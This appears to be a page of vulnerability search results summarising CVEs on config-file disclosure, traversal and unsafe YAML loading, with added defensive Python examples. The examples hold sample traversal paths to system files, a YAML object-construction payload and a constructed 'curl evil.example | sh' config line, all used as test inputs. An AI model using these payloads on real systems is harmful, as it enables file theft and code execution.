545 matches found

NVD
added 2026/01/29 3:16 p.m.

CVE-2020-37015

The Ruijie Networks Switch eWeb S29RGOS version 11.4 contains a directory traversal vulnerability that allows unauthenticated attackers to access sensitive configuration files by manipulating file path parameters. Attackers can exploit the /download.do endpoint with '../' sequences to retrieve...

CVSS 7.5, EPSS 0.00619, Exploits 0, References 4

Snyk
added 2026/01/28 11:00 p.m.

Improper Handling of Case Sensitivity

Overview: Affected versions of this package are vulnerable to Improper Handling of Case Sensitivity via the /api/file/getFile endpoint. An attacker can access sensitive configuration files by submitting mixed-case paths to bypass case-sensitive checks on case-insensitive file systems. Remediation...

CVSS 8.7, AI score 5.9, EPSS 0.00505, Exploits 1, References 2

RedhatCVE
added 2026/01/27 4:59 a.m.

CVE-2026-23889

A flaw was found in pnpm, a package manager. This vulnerability, known as path traversal, allows a malicious package to write files to unintended locations on Windows systems during the extraction of compressed archives (tarballs). The issue arises because pnpm's path normalization process does not...

CVSS 6.5, AI score 6.2, EPSS 0.00433, Exploits 1, References 6

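The three entries above (the '../' traversal on /download.do, the mixed-case bypass on /api/file/getFile, and the tarball written outside its target directory on Windows) are variants of one mistake: a caller-supplied path is used before it has been canonicalised and checked against the directory it is supposed to stay in. The following Python is an added example written for this page; it is not code from Ruijie, Snyk, pnpm or any of the advisories. The function names, the deny-list entry `config.json` and the sample requests are constructed for illustration, and treating backslashes as separators is an assumption about the Windows bug class, since the pnpm description is cut off before it says what the normalization misses.

```python
"""Canonicalise a caller-supplied path before it touches the filesystem.

Added example (not code from any of the advisories above or the projects
they describe).  It rejects '../' traversal, backslash separators and
drive letters (the Windows archive-extraction bug class; an assumption,
the pnpm text is cut off), symlinks that escape the base directory, and
case variants of a denied filename on case-insensitive filesystems.
"""
import os
import posixpath
import tempfile
from typing import Iterable, Sequence


class UnsafePath(ValueError):
    """Raised for any path that must not be served or written."""


def normalize_entry(name: str) -> str:
    """Return `name` as a clean relative POSIX path or raise UnsafePath.

    Backslashes are treated as separators because Windows does, so
    'a\\..\\b' cannot hide a traversal inside one 'filename'.
    """
    if "\0" in name:
        raise UnsafePath("NUL byte in path")
    name = name.replace("\\", "/")
    # Absolute paths, UNC-style '//server' and 'C:' drive prefixes never
    # belong in a relative entry name.
    if name.startswith("/") or (len(name) >= 2 and name[1] == ":"):
        raise UnsafePath(f"absolute path rejected: {name!r}")
    norm = posixpath.normpath(name)
    # normpath collapses 'a/../b' to 'b' but keeps a leading '..' when the
    # path climbs above its root; that leftover is the traversal.
    if norm in (".", "..") or norm.startswith("../"):
        raise UnsafePath(f"traversal rejected: {name!r}")
    return norm


def resolve_under(base_dir: str, name: str, denied: Iterable[str] = ()) -> str:
    """Return the real on-disk path for `name` below `base_dir`, or raise.

    realpath() follows symlinks, so a link inside base_dir that points
    outside is caught by the commonpath check (a plain startswith() would
    also accept '/srv/files_evil' for base '/srv/files').  The deny-list is
    compared with casefold() because on a case-insensitive filesystem
    'Config.JSON' opens 'config.json' even though a case-sensitive string
    compare lets it through.
    """
    rel = normalize_entry(name)
    base_real = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base_real, *rel.split("/")))
    if os.path.commonpath([base_real, target]) != base_real:
        raise UnsafePath(f"escapes base directory: {name!r}")
    denied_fold = {d.casefold() for d in denied}
    if any(part.casefold() in denied_fold for part in rel.split("/")):
        raise UnsafePath(f"denied file: {name!r}")
    return target


# Constructed requests, not taken from any advisory.
SAMPLE_REQUESTS: Sequence[str] = (
    "reports/2024/summary.txt",   # legitimate
    "../../../etc/passwd",        # classic '../' traversal
    "..\\..\\Windows\\win.ini",   # backslash traversal (Windows separators)
    "/etc/shadow",                # absolute path
    "C:\\boot.ini",               # drive letter
    "Config.JSON",                # case variant of a denied file
    "reports/../config.json",     # traversal that lands on a denied file
)


def triage(
    base_dir: str = os.path.join(tempfile.gettempdir(), "served_files"),
    names: Iterable[str] = SAMPLE_REQUESTS,
    denied: Iterable[str] = ("config.json",),
) -> dict:
    """Map each request to 'allowed' or the reason it was rejected."""
    verdicts = {}
    for n in names:
        try:
            resolve_under(base_dir, n, denied)
            verdicts[n] = "allowed"
        except UnsafePath as exc:
            verdicts[n] = str(exc)
    return verdicts


if __name__ == "__main__":
    for request, verdict in triage().items():
        print(f"{request!r:32} -> {verdict}")
```

For archive extraction specifically, Python 3.12's `tarfile.extractall(path, filter="data")` applies the same class of checks to every member; for a download endpoint, an allow-list of resolved real paths is more robust than a deny-list of names, because the deny-list has to anticipate every case and encoding variant of the file it is protecting.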
RedhatCVE
added 2026/01/09 10:43 a.m.

CVE-2022-26885

When using tasks to read config files, there is a risk of database password disclosure. We recommend you upgrade to version 2.0.6 or higher...

CVSS 7.5, AI score 6.8, EPSS 0.01234, Exploits 0, References 1

RedhatCVE
added 2026/01/07 9:32 a.m.

CVE-2019-16556

Jenkins Rundeck Plugin 3.6.5 and earlier stores credentials unencrypted in its global configuration file and in job config.xml files on the Jenkins master where they can be viewed by users with Extended Read permission, or access to the master file system...

CVSS 6.5, AI score 6.7, EPSS 0.00852, Exploits 0, References 1

RedhatCVE
added 2026/01/07 9:29 a.m.

CVE-2019-16557

Jenkins Redgate SQL Change Automation Plugin 2.0.3 and earlier stores credentials unencrypted in job config.xml files on the Jenkins master where they can be viewed by users with Extended Read permission, or access to the master file system...

CVSS 6.5, AI score 7.3, EPSS 0.00852, Exploits 0, References 1

Veracode
added 2026/01/07 7:23 a.m.

Remote Code Execution (RCE)

feast is vulnerable to remote code execution (RCE). The vulnerability is due to the use of yaml.load(..., Loader=yaml.Loader) to deserialize configuration YAML files before validation, which allows an attacker who can modify these files to instantiate arbitrary Python objects and execute OS commands ...

CVSS 7.8, AI score 8.2, EPSS 0.00264, Exploits 0, References 8, Affected Software 1

OSV
added 2026/01/06 4:15 p.m.

CVE-2020-36909

SnapGear Management Console SG560 3.1.5 contains a file manipulation vulnerability that allows authenticated users to read, write, and delete files using the editconfigfiles CGI script. Attackers can manipulate POST request parameters in /cgi-bin/cgix/editconfigfiles to access and modify files...

CVSS 8.8, AI score 5.8, Exploits 0, References 5

NVD
added 2026/01/06 4:15 p.m.

CVE-2020-36909

SnapGear Management Console SG560 3.1.5 contains a file manipulation vulnerability that allows authenticated users to read, write, and delete files using the editconfigfiles CGI script. Attackers can manipulate POST request parameters in /cgi-bin/cgix/editconfigfiles to access and modify files...

CVSS 8.8, EPSS 0.00636, Exploits 2, References 5

Cvelist
added 2026/01/06 3:52 p.m.

CVE-2020-36909 Secure Computing SnapGear Management Console SG560 3.1.5 Arbitrary File Read/Write

SnapGear Management Console SG560 3.1.5 contains a file manipulation vulnerability that allows authenticated users to read, write, and delete files using the editconfigfiles CGI script. Attackers can manipulate POST request parameters in /cgi-bin/cgix/editconfigfiles to access and modify files...

CVSS 8.7, EPSS 0.00636, Exploits 2, References 5

Snyk
added 2026/01/05 9:54 p.m.

Missing Authorization

Overview: Affected versions of this package are vulnerable to Missing Authorization via the /v1/users/image and /v1/sys/debug endpoints. An attacker can retrieve sensitive configuration files, system debug information, and enumerate file existence by sending crafted requests to these endpoints...

CVSS 6.9, AI score 6.8, EPSS 0.00548, Exploits 0, References 2

EUVD
added 2026/01/02 3:11 p.m.

EUVD-2025-206140

Signal K Server has Unauthenticated State Pollution leading to Remote Code Execution (RCE)...

CVSS 9.6, AI score 6.9, EPSS 0.17934, Exploits 3, References 4

Positive Technologies
added 2026/01/02 12:00 a.m.

PT-2026-1178

Name of the vulnerable software and affected versions: CasaOS versions up to and including 0.4.15. Description: CasaOS versions up to and including 0.4.15 have unauthenticated endpoints that allow remote attackers to retrieve sensitive configuration files and system debug information. The...

CVSS 6.9, AI score 6.2, EPSS 0.00548, Exploits 0, References 6

CNNVD
added 2026/01/02 12:00 a.m.

CasaOS security vulnerability

CasaOS is a simple, easy-to-use, and elegant open source home cloud system. A security vulnerability exists in CasaOS 0.4.15 and earlier versions, which stems from the exposure of multiple unauthenticated endpoints and could lead to the disclosure of sensitive configuration files and system...

CVSS 6.9, AI score 6.4, EPSS 0.00548, Exploits 0, References 4

Vulnrichment
added 2026/01/01 6:00 p.m.

CVE-2025-66398 Signal K Server has Unauthenticated State Pollution leading to Remote Code Execution (RCE)

Signal K Server is a server application that runs on a central hub in a boat. Prior to version 2.19.0, an unauthenticated attacker can pollute the internal state restoreFilePath of the server via the /skServer/validateBackup endpoint. This allows the attacker to hijack the administrator's "Restor...

CVSS 9.6, AI score 7.2, EPSS 0.17934, Exploits 3, References 2

OSV
added 2026/01/01 7:16 a.m.

CVE-2025-11157

A high-severity remote code execution vulnerability exists in feast-dev/feast version 0.53.0, specifically in the Kubernetes materializer job located at feast/sdk/python/feast/infra/computeengines/kubernetes/main.py. The vulnerability arises from the use of yaml.load(..., Loader=yaml.Loader) to...

CVSS 7.8, AI score 8.5, Exploits 0, References 2

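Both feast entries (the Veracode one earlier on this page and CVE-2025-11157 above) describe the same pattern: a configuration YAML parsed with `yaml.load(..., Loader=yaml.Loader)` before any validation. The following Python is an added example for this page, not feast's code, showing why that loader is the problem and what the safe replacement looks like. It assumes PyYAML is installed; the config layout, the key `materialization.image`, the function names and the tag payload are constructed for illustration.

```python
"""yaml.load(..., Loader=yaml.Loader) versus the SafeLoader on a config file.

Added example, not feast code.  It assumes the pattern the two feast
entries describe: a config YAML parsed with the full Loader before any
validation.  PyYAML is a third-party dependency; the config layout and
the tag payload below are constructed for illustration.
"""
try:
    import yaml
except ImportError:  # PyYAML not installed: the demo functions cannot run
    yaml = None


class UnsafeConfig(ValueError):
    """Raised when the YAML carries tags the safe loader will not build,
    or does not have the expected shape."""


# Constructed: looks like an ordinary job config, but the '!!python/object/apply'
# tag makes the full Loader import a module and call a function of the
# attacker's choosing with the given arguments.  posixpath.join is used so the
# effect is visible and harmless; os.system or subprocess.Popen work the same way.
MALICIOUS_CONFIG = """\
project: demo
materialization:
  image: !!python/object/apply:posixpath.join ["/tmp", "pwned"]
"""

BENIGN_CONFIG = """\
project: demo
materialization:
  image: ghcr.io/example/materializer:1.0
"""


def pyyaml_available() -> bool:
    return yaml is not None


def load_config_unsafe(text: str) -> dict:
    """The vulnerable pattern: the full Loader honours every '!!python/...'
    tag, so parsing the file already runs attacker-chosen code."""
    return yaml.load(text, Loader=yaml.Loader)


def load_config(text: str) -> dict:
    """Hardened: the SafeLoader builds only plain scalars, lists and
    mappings, and the shape is validated before anything uses it."""
    try:
        data = yaml.load(text, Loader=yaml.SafeLoader)
    except yaml.YAMLError as exc:
        # SafeLoader raises a ConstructorError for tags it will not build.
        raise UnsafeConfig(f"refusing config: {exc}") from exc
    if not isinstance(data, dict) or not isinstance(data.get("materialization"), dict):
        raise UnsafeConfig("config must be a mapping with a 'materialization' mapping")
    image = data["materialization"].get("image")
    if not isinstance(image, str):
        raise UnsafeConfig("materialization.image must be a string")
    return data


if __name__ == "__main__":
    if pyyaml_available():
        print("full Loader built:", load_config_unsafe(MALICIOUS_CONFIG)["materialization"]["image"])
        try:
            load_config(MALICIOUS_CONFIG)
        except UnsafeConfig as exc:
            print("SafeLoader:", exc)
        print("benign:", load_config(BENIGN_CONFIG)["materialization"]["image"])
```

The point of the shape check after `SafeLoader` is that "safe" only means no object construction; a config that deserialises to a list, or whose `image` is a mapping, still has to be rejected before it reaches whatever builds the Kubernetes job from it.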
CNNVD
added 2025/12/30 12:00 a.m.

The Shit security vulnerability

The Shit is a command line utility by the individual developer AsfhtgkDavid for automatically detecting and fixing common errors in shell commands. A security vulnerability exists in versions of The Shit prior to 0.1.1 that stems from a failure to verify ownership of configuration files and...

CVSS 6.7, AI score 5.8, EPSS 0.0012, Exploits 0, References 2

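The description above is cut off after "failure to verify ownership of configuration files and", so what follows is an added Python example of the general check a tool like this needs before it trusts a config file; it is not code from The Shit. It assumes the usual shape of the bug: a config that can carry commands or aliases the tool will run, read from a location another local user could own or write to. The names `open_trusted_config`, `UntrustedConfig` and `demo`, and the three files `demo` creates, are constructed for illustration; the code is POSIX only.

```python
"""Refuse a configuration file the current user does not own or that
others can write, checking the open descriptor rather than the path.

Added example, not code from The Shit.  Assumes the generic bug class:
a CLI tool reads a config that can contain commands or aliases it will
run, from a location another local user could own or write.  POSIX only
(st_uid, geteuid, O_NOFOLLOW); demo() builds its own files.
"""
import os
import stat
import tempfile


class UntrustedConfig(Exception):
    """The file exists but must not be trusted."""


def open_trusted_config(path: str, allow_root_owned: bool = True) -> str:
    """Return the file's text only if it is a regular file, owned by the
    effective user (or root, for packaged defaults), and not writable by
    group or others.

    O_NOFOLLOW refuses a symlink at `path`, and the checks run on fstat()
    of the descriptor that is then read, so the file cannot be swapped
    between check and use.
    """
    flags = os.O_RDONLY | os.O_NOFOLLOW | getattr(os, "O_CLOEXEC", 0)
    fd = os.open(path, flags)          # raises OSError (ELOOP) on a symlink
    try:
        st = os.fstat(fd)
        if not stat.S_ISREG(st.st_mode):
            raise UntrustedConfig(f"{path}: not a regular file")
        allowed_owners = {os.geteuid()} | ({0} if allow_root_owned else set())
        if st.st_uid not in allowed_owners:
            raise UntrustedConfig(f"{path}: owned by uid {st.st_uid}, not by us")
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            raise UntrustedConfig(
                f"{path}: writable by others (mode {stat.S_IMODE(st.st_mode):04o})")
        with os.fdopen(fd, "r", encoding="utf-8") as f:
            fd = -1                    # the file object now owns the descriptor
            return f.read()
    finally:
        if fd != -1:
            os.close(fd)


def demo() -> dict:
    """Create three constructed config files and report each verdict:
    'trusted', 'UntrustedConfig' or 'OSError'."""
    verdicts = {}
    with tempfile.TemporaryDirectory() as d:
        private = os.path.join(d, "config")
        with open(private, "w") as f:
            f.write("alias ll = ls -la\n")
        os.chmod(private, 0o600)

        shared = os.path.join(d, "config.world_writable")
        with open(shared, "w") as f:
            f.write("alias ll = curl http://evil.example/x | sh\n")  # constructed
        os.chmod(shared, 0o666)

        link = os.path.join(d, "config.symlink")
        os.symlink(private, link)

        for label, p in (("private", private), ("world_writable", shared), ("symlink", link)):
            try:
                open_trusted_config(p)
                verdicts[label] = "trusted"
            except (UntrustedConfig, OSError) as exc:
                verdicts[label] = type(exc).__name__
    return verdicts


if __name__ == "__main__":
    for label, verdict in demo().items():
        print(f"{label:16} {verdict}")
```

Two things the check deliberately does not cover: a parent directory that others can write (they could not replace the file without it failing the owner check, but they could remove it), and a user-owned file that was planted through some other bug. The ownership and mode checks close the local-attacker path the advisory describes; they are not a substitute for not executing config contents at all.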
Cvelist
added 2025/12/24 7:27 p.m.

CVE-2019-25239 V-SOL GPON/EPON OLT Platform 2.03 Unauthenticated Configuration Download

V-SOL GPON/EPON OLT Platform 2.03 contains an unauthenticated information disclosure vulnerability that allows attackers to download configuration files via direct object reference. Attackers can retrieve sensitive configuration data by sending HTTP GET requests to the usrcfg.conf endpoint,...

CVSS 8.7, EPSS 0.00355, Exploits 1, References 3

Vulnrichment
added 2025/12/24 7:27 p.m.

CVE-2018-25137 FLIR Brickstream 3D+ 2.1.742.1842 Unauthenticated Config File Disclosure

FLIR Brickstream 3D+ 2.1.742.1842 contains an unauthenticated vulnerability in the ExportConfig REST API that allows attackers to download sensitive configuration files. Attackers can exploit the getConfigExportFile.cgi endpoint to retrieve system configurations, potentially enabling authenticati...

CVSS 8.7, AI score 6.8, EPSS 0.00434, Exploits 1, References 3

Veracode
added 2025/12/13 4:17 a.m.

Arbitrary Code Execution

QOS.CH logback-core is vulnerable to Arbitrary Code Execution. The vulnerability is due to unsafe conditional processing of configuration files and environment variables, which allows an attacker with existing privileges to inject or modify a malicious configuration and execute arbitrary code at...

CVSS 7, AI score 8, EPSS 0.00181, Exploits 0, References 6, Affected Software 1
